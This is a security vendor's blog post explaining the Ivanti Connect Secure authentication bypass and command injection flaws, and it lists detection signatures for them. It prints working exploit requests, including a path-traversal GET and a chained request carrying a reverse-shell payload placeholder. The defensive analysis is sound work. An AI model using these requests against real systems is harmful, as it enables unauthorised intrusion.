Ivanti CVE-2023-46805 and CVE-2024-21887 Zero-Day Vulnerabilities Actively Exploited

The Blue Report 2023

Analysis of 14m Attack Simulations Reveals Organizations Only Prevent 6 out of Every 10 Attacks.

DOWNLOAD

On January 19, 2024, The Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive on Ivanti CVE-2023-46805 and CVE-2024-21887 vulnerabilities [1]. The agency reported that the vulnerabilities pose unacceptable risks to many federal agencies and should be mitigated immediately. The CVE-2023-46805 and CVE-2024-21887 have CVSS scores of 8.2 (High) and 9.1 (Critical), respectively, and can be exploited for arbitrary command execution in vulnerable products.

In this blog, we explained in detail how adversaries exploit Ivanti CVE-2023-46805 and CVE-2024-21887 vulnerabilities.

Simulate Vulnerability Exploitation Attacks with 14-Day Free Trial of Picus Platform

Ivanti CVE-2023-46805 and CVE-2024-21887 Vulnerabilities Explained

Ivanti Connect Secure and Policy Secure are popular products used by organizations to secure remote connections and manage network access policies. On January 10, 2024, Ivanti issued a security advisory about two zero-day vulnerabilities affecting Ivanti Connect Secure and Policy Secure. The CVE-2023-46805 vulnerability is an authentication bypass vulnerability with a CVSS score of 8.2 (High), and the CVE-2024-21887 vulnerability is a command injection vulnerability with a CVSS score of 9.1 (Critical). Adversaries were observed using the vulnerabilities in conjunction for remote code execution on the vulnerable Ivanti products.

Due to its widespread use in Federal Civilian Executive Branch (FCEB) agencies, CISA issued an emergency directive that required agencies to implement suggested mitigations immediately. A quick Shodan search shows that over 17,000 Connect Secure and Policy Secure gateways are exposed online. Considering these are high-impact zero-day vulnerabilities affecting all supported versions, organizations are advised to apply mitigations without delay.

Affected Products

Affected Versions

Ivanti Connect Secure

versions 9.x

versions 22.x

Ivanti Policy Secure

versions 9.x

versions 22.

How Ivanti CVE-2023-46805 Exploit Works?

Ivanti CVE-2023-46805 vulnerability is an authentication bypass vulnerability found in the web component of Ivanti Connect Secure and Policy Secure products.

The vulnerability is caused by a path traversal vulnerability found in the "/api/v1/totp/user-backup-code" endpoint. Additionally, this endpoint does not require any authentication, allowing adversaries to access public-facing endpoints.

Adversaries combine the lack of authentication and path traversal vulnerability to access resources located in the endpoint [2].

//Example GET Request to test for CVE-2023-46805


GET /api/v1/totp/user-backup-code/../../system/system-information
HTTP/1.1 Host: <IP_Vulnerable_Ivanti_Product>
Content-Length: 0


//Response from the vulnerable product

    "system-information" : {

        "Cluster-node" : {},

        "Hardware-model" : "PSA-3000",

        "host-name" : <redacted>

        "machine-id" : <redacted>

        "os-name" : "ive-sa",

        "os-version" : "9.1R18.1",

        "serial-number": <redacted>

    }

How Ivanti CVE-2024-21887 Exploit Works?

Ivanti CVE-2024-21887 vulnerability is a command injection vulnerability found in "/api/v1/license/key-status/<path:node_name>" API endpoint. Adversaries were able to access this endpoint using the CVE-20203-46805 vulnerability and append their payload to be executed by the vulnerable Ivanti product. The example below shows how adversaries use both vulnerabilities in conjunction to create a reverse shell [3].

GET /api/v1/totp/user-backup-code/../../license/keys-status/<url_encoded_python_reverse_shell> 

HTTP/1.1 Host: <IP_Vulnerable_Ivanti_Product>

How Picus Helps Simulate Ivanti CVE-2023-46805 and CVE-2024-21887 Attacks?

We also strongly suggest simulating the Ivanti CVE-2023-46805 and CVE-2024-21887 vulnerabilities to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Complete Security Validation Platform. You can also test your defenses against other vulnerability exploitation attacks, such as Citrix Bleed, Follina, and Looney Tunables, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Ivanti CVE-2023-46805 and CVE-2024-21887 vulnerability exploitation attacks:

Threat ID

Threat Name

Attack Module

20849

Ivanti Connect Secure Web Attack Campaign

Web Application

70762

Ivanti Policy Secure Web Attack Campaign

Web Application

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address Ivanti CVE-2023-46805 and CVE-2024-21887 vulnerability exploitation attacks in preventive security controls. Currently, Picus Labs validated the following signatures for Ivanti CVE-2023-46805 and CVE-2024-21887 vulnerabilities:

Security Control

Signature ID

Signature Name

Check Point NGFW

asm_dynamic_prop_CMD_INJECTION

Command Injection Over HTTP

Cisco FirePower

1.62896.1

SERVER-WEBAPP Ivanti Secure Connect command injection attempt

Cisco FirePower

1.62894.1

SERVER-WEBAPP Ivanti Secure Connect authentication bypass attempt

F5 BIG-IP

200101550

Directory Traversal attempt (Content)

F5 BIG-IP

200007029

Directory Traversal attempt "../" (URI)

F5 BIG-IP

200003214

"curl" execution attempt (URI)

Forcepoint NGFW

 

HTTP_CSU-Ivanti-Connect-Secure-Authentication-Bypass-CVE-2023-46805

Fortigate IPS

54588

Ivanti.Connect.Secure.Policy.Secure.Authentication.Bypass

Fortiweb

50180008

Generic Attacks

Imperva SecureSphere

 

Directory Traversal - 16

ModSecurity

930110

Path Traversal Attack (/../)

Palo Alto

30844

HTTP Directory Traversal Request Attempt

Snort

1.2050131.1

ET WEB_SPECIFIC_APPS Possible Ivanti Pulse Secure Authentication Bypass and Command Injection Attempt (CVE-2023-46805, CVE-2024-21887)

Snort

1.62896.1

SERVER-WEBAPP Ivanti Secure Connect command injection attempt

Snort

1.62894.1

SERVER-WEBAPP Ivanti Secure Connect authentication bypass attempt

Trellix

0x40200c00

HTTP: CGI Escape Character Directory Traversal Vulnerability

Start simulating emerging threats today and get actionable mitigation insights with a  14-day free trial of the Picus Complete Security Validation Platform.

References

[1] "ED 24-01: Mitigate Ivanti Connect Secure and Ivanti Policy Secure Vulnerabilities," Cybersecurity and Infrastructure Security Agency CISA. Available: https://www.cisa.gov/news-events/directives/ed-24-01-mitigate-ivanti-connect-secure-and-ivanti-policy-secure-vulnerabilities. [Accessed: Jan. 20, 2024]

[2] "GitHub - duy-31/CVE-2023-46805_CVE-2024-21887," GitHub. Available: https://github.com/duy-31/CVE-2023-46805_CVE-2024-21887. [Accessed: Jan. 20, 2024]

[3] "High Signal Detection and Exploitation of Ivanti's Pulse Connect Secure Auth Bypass & RCE." Available: https://www.assetnote.io/resources/research/high-signal-detection-and-exploitation-of-ivantis-pulse-connect-secure-auth-bypass-rce. [Accessed: Jan. 20, 2024]